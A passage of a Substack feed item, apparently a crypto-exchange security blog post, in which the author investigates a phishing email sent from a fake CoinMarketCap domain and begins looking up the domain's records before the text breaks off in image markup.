https://substackcdn.com/image/fetch/$s_!jsVn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p></p>]]></content:encoded></item><item><title><![CDATA[How do you say "phishing" in Polish?]]></title><description><![CDATA[&#127477;&#127473; Phishingowe]]></description><link>https://quetzal.bitso.com/p/how-do-you-say-phishing-in-polish</link><guid isPermaLink="false">https://quetzal.bitso.com/p/how-do-you-say-phishing-in-polish</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Fri, 01 Aug 2025 15:55:28 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!E67U!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!E67U!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!E67U!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!E67U!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!E67U!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!E67U!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!E67U!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png" width="460" height="460" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:460,&quot;bytes&quot;:2118659,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/169770698?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!E67U!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!E67U!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!E67U!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!E67U!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44eb4ca3-9ab2-4f69-924c-84a1dfa67462_1024x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>North Koreans, North Koreans, North Koreans. It&#8217;s all we talk about these days. So when we come across another kind of <s>vermin</s> Threat Actor, it feels&#8230; refreshing.</p><p><strong>This time, everything was different: </strong>I couldn&#8217;t blame my <a href="https://linkedin.com">least favourite site in the world</a>, I couldn&#8217;t point fingers at <a href="https://en.wikipedia.org/wiki/Lazarus_Group">ACME&#8217;s top customer</a>, and I couldn&#8217;t even rip apart a malware sample.</p><p>But at least, I found a <strong>novel</strong> and creative way to compromise victims in the crypto sector. Let&#8217;s get to it.</p><div><hr></div><h2>Potential Coverage</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IngW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IngW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png 424w, https://substackcdn.com/image/fetch/$s_!IngW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png 848w, https://substackcdn.com/image/fetch/$s_!IngW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png 1272w, https://substackcdn.com/image/fetch/$s_!IngW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!IngW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png" width="1456" height="808" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:808,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:584914,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/169770698?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IngW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png 424w, https://substackcdn.com/image/fetch/$s_!IngW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png 848w, https://substackcdn.com/image/fetch/$s_!IngW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png 1272w, https://substackcdn.com/image/fetch/$s_!IngW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3fd6159c-4ea5-4156-be21-1d3f76f1f210_2378x1320.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Phishing email with a fake domain (team-coinmarketcap[.]com)</figcaption></figure></div><p>It all started with an email from someone claiming to work at CoinMarketCap&#8217;s editorial team, wanting to write an article about our company.</p><p>It was sent to specific people within the organisation, those with slightly more exposure than the average employee.</p><p>The first thing we noticed was the fake domain: <code>team-coinmarketcap[.]com</code>, registered just a few days earlier, on July 26th. Naturally, my first thought was that the Pyongyang Crew wanted to have some fun and work on their score (they&#8217;re way lower on the scoreboard compared to us) so I accepted the quest. But this had nothing to do with the Kim Boyz.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!WO2i!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!WO2i!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png 424w, https://substackcdn.com/image/fetch/$s_!WO2i!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png 848w, https://substackcdn.com/image/fetch/$s_!WO2i!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png 1272w, https://substackcdn.com/image/fetch/$s_!WO2i!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!WO2i!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png" width="1456" height="1096" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1096,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:593903,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/169770698?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!WO2i!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png 424w, https://substackcdn.com/image/fetch/$s_!WO2i!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png 848w, https://substackcdn.com/image/fetch/$s_!WO2i!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png 1272w, https://substackcdn.com/image/fetch/$s_!WO2i!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19a78759-99f3-4846-9281-eb21d00622df_2378x1790.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I booked a call via Calendly, where they had set up a fake profile using CoinMarketCap&#8217;s branding and naming, logos included.</p><p>While waiting for the meeting to take place, I started digging into their domain.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!M13Y!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!M13Y!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png 424w, https://substackcdn.com/image/fetch/$s_!M13Y!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png 848w, https://substackcdn.com/image/fetch/$s_!M13Y!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png 1272w, https://substackcdn.com/image/fetch/$s_!M13Y!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!M13Y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png" width="1456" height="726" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:726,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:610394,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/169770698?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!M13Y!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png 424w, https://substackcdn.com/image/fetch/$s_!M13Y!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png 848w, https://substackcdn.com/image/fetch/$s_!M13Y!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png 1272w, https://substackcdn.com/image/fetch/$s_!M13Y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc4e690-d9cc-44d2-8a77-a098dc5bfbf1_2888x1440.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">OTX Report for team-coinmarketcap[.]com</figcaption></figure></div><p>Our first stop is <strong>LevelBlue OTX</strong> (formerly <strong>AlienVault</strong>), our favourite open threat intel exchange hub.</p><p>Here, we noticed three interesting things:</p><ol><li><p>The website points to a <strong>private IP address</strong> (127.0.0.127), meaning it&#8217;s <strong>unreachable</strong> from anywhere and <strong>unable to serve content</strong>.</p></li><li><p>It was delegated to <strong>Cloudflare</strong>.</p></li><li><p>It was created on <strong>July 26th</strong> of this year (yes, just a few days ago).</p></li></ol><p>Why buy a domain without hosting any content?</p><p>Maybe they&#8217;re hosting something else. Time to dig in (literally, using the <code>dig</code> tool).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Tidc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Tidc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png 424w, https://substackcdn.com/image/fetch/$s_!Tidc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png 848w, https://substackcdn.com/image/fetch/$s_!Tidc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png 1272w, https://substackcdn.com/image/fetch/$s_!Tidc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Tidc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png" width="1456" height="973" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:973,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:575134,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/169770698?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Tidc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png 424w, https://substackcdn.com/image/fetch/$s_!Tidc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png 848w, https://substackcdn.com/image/fetch/$s_!Tidc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png 1272w, https://substackcdn.com/image/fetch/$s_!Tidc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F922f2a60-cff6-4962-a3f5-0be3a02da160_2612x1746.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg 